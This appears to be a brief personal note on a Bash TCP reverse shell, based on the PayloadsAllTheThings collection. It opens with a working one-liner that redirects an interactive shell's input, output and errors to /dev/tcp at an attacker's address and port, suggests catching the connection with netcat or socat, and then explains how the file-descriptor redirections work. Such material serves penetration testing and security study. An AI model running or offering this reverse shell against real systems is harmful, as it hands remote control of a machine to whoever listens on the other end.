bash -li &> /dev/tcp/$ATTACKER_IP/$LISTENER_PORT 0>&1(Based on the PayloadsAllTheThings Bash TCP reverse shell.)
Catch it with netcat or socat.
(That said, the fact that all of my file descriptors wind up pointing at /dev/tcp is a little mysterious to me. I think what’s happening here is that /dev/tcp is bidirectional “out of the box” — incoming data comes out, just as outgoing data goes in — so binding all three “core” file descriptors to it does the right thing. That, and realize that the X>&Y construct means “bind file descriptor X to file descriptor Y”, and &> is just short for 2>&1 >, and > is just short for 1 >. So really what’s happening here is that we bind STDERR to STDOUT with and implicit 2>&1, then bind STDOUT to /dev/tcp with an implicit 1 >, then bind STDIN to /dev/tcp as well with 0>&1.)